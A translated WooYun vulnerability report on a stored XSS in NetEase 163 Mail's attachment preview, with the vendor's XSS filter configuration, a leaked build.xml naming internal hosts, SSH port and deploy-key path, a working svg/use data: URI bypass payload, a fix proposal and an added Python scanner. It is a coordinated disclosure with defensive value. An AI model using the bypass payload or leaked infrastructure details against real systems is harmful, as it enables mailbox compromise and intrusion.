
Vulnerability summary

Defect ID: wooyun-2016-0170351

Title: Stored XSS in 163 NetEase Mail

Vendor: NetEase (网易)

Author: mramydnei

Submitted: 2016-01-16 13:10

Fixed: 2016-03-04 13:27

Published: 2016-03-04 13:27

Type: XSS (cross-site scripting)

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-16: Details reported to the vendor, awaiting the vendor's handling
2016-01-19: Vendor confirmed; details disclosed to the vendor only
2016-01-29: Details disclosed to core white hats and domain experts
2016-02-08: Details disclosed to regular white hats
2016-02-18: Details disclosed to intern white hats
2016-03-04: Details disclosed to the public

Brief description:

An exception got thrown, which made the problem a lot simpler.

Detailed description:

While testing the preview of a fairly large .htm file in NetEase Mail, the following exception was thrown:

com.netease.mail.preview.exception.ProxyException: com.netease.security.xssdefender.filter.exception.TimeoutException: XSS filter timeouted!


The class name looked distinctive enough to search GitHub for, and that turned up this repository:

https://github.com/RyanTech/spider-2/


Its build.xml references 163.org and netease in several places, so this is almost certainly NetEase's own code:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE project [<!ENTITY buildfile SYSTEM "file:./build-user.xml">]>
<!-- WARNING: Eclipse autogenerated file.
Any modifications will be overwritten.
Please edit build-user.xml instead.
-->
<project basedir="." default="release" name="pris-fetcher">
  <property name="bin.dir" value="bin" />
  <property name="lib.dir" value="lib" />
  <property name="build.dir" value="build"/>
  <property name="release.dir" value="release"/>
  <property name="release.lib" value="release/lib"/>
  <property name="release.conf" value="release/conf"/>
  <property name="ssh.keyfile" value="e:/id_rsa"/>
  <!-- clean task -->
  <target name="clean">
    <delete dir="${build.dir}"/>
  </target>

  <!-- create directories -->
  <target name="init" depends="clean">
    <mkdir dir="${build.dir}"/>
  </target>

  <path id="classpath">
    <fileset dir="${lib.dir}">
      <include name="*.jar"/>
    </fileset>
  </path>

  <target name="build" depends="init" description="Build jar">
    <jar jarfile="${build.dir}/common.jar" basedir="${bin.dir}">
      <include name="com/netease/backend/collector/rss/common/**/*.class"/>
      <exclude name="com/netease/backend/collector/rss/common/**/*Test.class"/>
    </jar>
    <jar jarfile="${build.dir}/crawler.jar" basedir="${bin.dir}">
      <include name="com/netease/backend/collector/rss/crawler/**/*.class"/>
      <include name="org/archive/crawler/**/*.class"/>
      <exclude name="com/netease/backend/collector/rss/crawler/**/*Test.class"/>
    </jar>
    <jar jarfile="${build.dir}/manager.jar" basedir="${bin.dir}">
      <include name="com/netease/backend/collector/rss/manager/**/*.class"/>
      <exclude name="com/netease/backend/collector/rss/manager/**/*Test.class"/>
    </jar>
  </target>

  <target name="common-release" depends="build">
    <delete>
      <fileset dir="${release.lib}" includes="*.jar"/>
    </delete>
    <copy todir="${release.lib}">
      <fileset dir="${build.dir}">
        <include name="*.jar"/>
      </fileset>
    </copy>
    <copy todir="${release.lib}">
      <fileset dir="${lib.dir}">
        <include name="fetcher-common*.jar" />
        <include name="dcas-analyzer*.jar" />
      </fileset>
    </copy>
  </target>
  <!-- release version -->
  <target name="release" depends="common-release">
    <delete>
      <fileset dir="${release.conf}">
        <exclude name="**/.svn**" />
      </fileset>
    </delete>
    <move todir="${release.conf}">
      <fileset dir="${release.conf}">
      </fileset>
      <mapper type="regexp" from="^(.*)-online.(.*)$$" to="\1.\2" />
    </move>
  </target>

  <target name="test" depends="common-release">
    <delete>
      <fileset dir="${release.dir}/test-conf">
        <exclude name="**/.svn**" />
      </fileset>
    </delete>
  </target>

  <!-- restart the test server -->
  <target name="restart-test">
    <sshexec host="app-61.photo.163.org" port="1046"
             username="yuedu" trust="true" keyfile="${ssh.keyfile}"
             command="cd /home/yuedu/pris-fetcher/;svn up lib/ rss-lib/ common-conf/;
             sh duplicationFilter/bin/df.sh;sh start.sh;"/>
  </target>

  <!-- online upgrade: update the jars and conf files on every node, then restart every node -->
  <target name="upgrade-online">
    <sshexec host="yuedu4.photo.163.org" port="1046"
             username="yuedu" trust="true" keyfile="${ssh.keyfile}"
             command="cd /home/yuedu/pris-fetcher/;svn up lib/ rss-lib/;sh start-df.sh;sh start.sh;
             cd /mnt/hdir/0/dcas-default;sh start.sh;"/>
    <sshexec host="yuedu5.photo.163.org" port="1046"
             username="yuedu" trust="true" keyfile="${ssh.keyfile}"
             command="cd /mnt/hdir/0/pris-fetcher-news/;svn up lib/ rss-lib/;
             cd /home/yuedu/pris-fetcher-photo/;sh start.sh;"/>
    <sshexec host="app-57.photo.163.org" port="1046"
             username="dir" trust="true" keyfile="${ssh.keyfile}"
             command="cd /home/dir/pris-fetcher-2/;svn up lib/ rss-lib/;sh start.sh;
             cd ../pris-fetcher-news-2/;sh start.sh;"/>
    <sshexec host="app-48.photo.163.org" port="1046"
             username="dir" trust="true" keyfile="${ssh.keyfile}"
             command="cd /home/dir/pris-fetcher-2/;svn up lib/ rss-lib/;sh start.sh;"/>
  </target>
</project>


Beyond confirming the owner, the build file is a leak in its own right: the sshexec targets expose internal host names under photo.163.org, the non-standard SSH port 1046, the deploy user names, the deployment paths and the location of the deploy key, and trust="true" tells Ant to accept any host key the server presents. I grabbed the jar below and took it home to see how the XSS filtering works:

https://github.com/RyanTech/spider-2/blob/master/lib/xssdefender-1.3.6.jar


Here is its base-config.properties:

######################################
# base configuration for XSS Defender
# @author: superekcah
# format:
# string|value
# set|value1,value2
# map|key1:value1,value2;key2:value3,value4
######################################
# implementation class for tag handling
tagHandler=string|com.netease.security.xssdefender.filter.NodeFilter
# implementation class of the alarm interface
alarm=string|
# tag whitelist; empty means whitelist filtering is not used
tagsWhitelist=set|
# tags to remove together with their content and child nodes
removeNodeTags=set|head,script,style,object,applet,noscript,frameset,noframes
# tags to remove by themselves, keeping their content and child nodes
removeTagOnlyTags=set|form,meta,body,html,label,select,optgroup,option,textarea,title,script,xmp,applet,embed,head,frameset,iframe,noframes,noscript,object,style,input,base,basefont,isindex,link,frame,param,xml,xss
# attributes to strip for the given tags
nodeAttrBlacklist=map|
# attributes allowed to remain for the given tags
nodeAttrWhitelist=map|img:src,alt,width,height;a:href,target,class;
# keywords checked in attribute values; note: only checks whether the value starts with one of them
scriptKeywords=set|javascript,vbscript,script,actionscript
# CSS properties allowed to remain; note: if the set holds the single value all, every property is allowed
allowedStyleProps=set|font,font-size,font-weight,font-style,text-decoration,width,height,border,margin,padding
# validate URL attributes with a regex; default is the default check; empty means only the keyword-prefix check is done
urlValidators=map|default:^(https?://|/|#|mailto\\s*:).*
# attributes to strip; /regex/ is a regular expression, anything else must match literally
forbidAttributes=set|/on[a-zA-Z]+/,allowScriptAccess,allowNetworking,disabled
# attributes checked for a keyword prefix
keywordsCheckedAttributes=set|background


What is filtered and what is not is obvious at a glance, so there is little left to analyse: neither svg nor use appears in removeNodeTags or removeTagOnlyTags, and none of the attribute rules names xlink:href.
Build a PoC and pwn it.

Proof of vulnerability:

Save the following as pwn.htm:

<svg>
<use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></svg>


Attach it to an email and send it to the victim. When the victim previews the file:

(screenshot: Screenshot 2016-01-16 1.51.09 PM.png)


Game over. The PoC above has to be verified in Firefox, which at the time executed script inside an SVG document pulled in through a data: URI on use.
If the impact seems insufficient, contact me and I can provide a more generic PoC.
Finally, if this turns out to be a Coremail issue, please let me know so I can go and claim the bounty there.

Fix proposal:

Add svg to removeNodeTags? More robustly, also run xlink:href (and every other namespaced href/src attribute) through urlValidators: the default regex ^(https?://|/|#|mailto\s*:).* already rejects data: and javascript: URLs.
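As an added example (not code from this report, from the spider-2 repository or from XSS Defender), the Python below shows the check the filter configured above is missing, and the one the fix proposal calls for: treat namespaced attributes such as xlink:href as URL attributes, decode data: URIs, and scan the embedded document recursively, so that the script element and the javascript: embed hidden inside the PoC's base64 are found. The default URL regex is copied from base-config.properties; the set of URL-bearing attributes and the list of dangerous elements are the example's own assumptions, because the config does not show which attributes the real filter validates; the input is the report's own pwn.htm, embedded inline with the base64 joined onto one line.

```python
"""Recursive data:-URI scanner for mail-preview sanitisation.

Added example for this report, not NetEase's XSS Defender code. It shows the
check the filter above lacks: treat namespaced attributes such as xlink:href
as URL attributes, decode data: URIs, and scan the embedded document again.
"""
import base64
import re
import urllib.parse
from html.parser import HTMLParser

# The default URL validator from base-config.properties on this page
# (the properties file escapes the backslash as \\s; this is the plain regex).
DEFAULT_URL_VALIDATOR = re.compile(r"^(https?://|/|#|mailto\s*:).*")

# Assumption: the attributes XSS Defender treats as URL-bearing are not visible
# in its config, so this set is the example's own. It includes xlink:href.
URL_ATTRS = {"href", "xlink:href", "src", "action", "formaction", "data", "poster", "background"}

# Elements that must not survive into rendered preview content (example's own list).
DANGEROUS_TAGS = {"script", "embed", "object", "iframe", "foreignobject"}

SCRIPT_SCHEMES = ("javascript:", "vbscript:")


class _Collector(HTMLParser):
    """Records (tag, attrs) for every start tag; html.parser lowercases both."""

    def __init__(self):
        super().__init__()
        self.nodes = []

    def handle_starttag(self, tag, attrs):
        self.nodes.append((tag, dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.nodes.append((tag, dict(attrs)))


def passes_default_validator(url):
    """True if the page's default urlValidators regex accepts the URL."""
    return DEFAULT_URL_VALIDATOR.match(url.strip()) is not None


def decode_data_uri(value):
    """Return the decoded body of a data: URI, or None for any other URL.

    The fragment (the PoC's #rectangle) is dropped before decoding, and
    whitespace inside the base64 payload is ignored, as browsers do.
    """
    stripped = value.strip()
    if not stripped.lower().startswith("data:"):
        return None
    header, _, body = stripped[5:].partition(",")
    body = body.split("#", 1)[0]
    if header.lower().endswith(";base64"):
        cleaned = re.sub(r"\s+", "", body)
        cleaned += "=" * (-len(cleaned) % 4)
        return base64.b64decode(cleaned).decode("utf-8", "replace")
    return urllib.parse.unquote(body)


def scan(markup, depth=0, max_depth=5):
    """Return (depth, kind, where) findings for markup and for every data:
    document it embeds, recursing up to max_depth levels."""
    findings = []
    if depth > max_depth:
        return findings
    collector = _Collector()
    collector.feed(markup)
    for tag, attrs in collector.nodes:
        if tag in DANGEROUS_TAGS:
            findings.append((depth, "tag", tag))
        for name, value in attrs.items():
            if value is None or name not in URL_ATTRS:
                continue
            if value.strip().lower().startswith(SCRIPT_SCHEMES):
                findings.append((depth, "script-url", f"{tag}@{name}"))
            inner = decode_data_uri(value)
            if inner is not None:
                findings.append((depth, "data-uri", f"{tag}@{name}"))
                findings.extend(scan(inner, depth + 1, max_depth))
    return findings


# Constructed input: the report's pwn.htm, with the base64 joined onto one line.
POC_DATA_URI = (
    "data:image/svg+xml;base64,"
    "PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmci"
    "IHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+"
    "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0K"
    "IDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i"
    "NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQg"
    "eG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+"
    "#rectangle"
)
POC_HTM = '<svg>\n<use xlink:href="' + POC_DATA_URI + '" /></svg>'

if __name__ == "__main__":
    for depth, kind, where in scan(POC_HTM):
        print("  " * depth + f"{kind}: {where}")
    print("default validator accepts the outer xlink:href:",
          passes_default_validator(POC_DATA_URI))
```

Running it prints the findings tree for pwn.htm: the data: URI on use@xlink:href at depth 0, and at depth 1 the script element, the foreignObject, and the embed whose src is a javascript: URL. It also shows that the page's default urlValidators regex already rejects the data: URI, so applying that validator to xlink:href would have blocked this PoC without removing svg wholesale.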

Copyright notice: please credit mramydnei@WooYun when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-01-19 15:38

Vendor reply:

The vulnerability has been confirmed and will be fixed shortly. Thank you for your attention to NetEase products.

Latest status:

None yet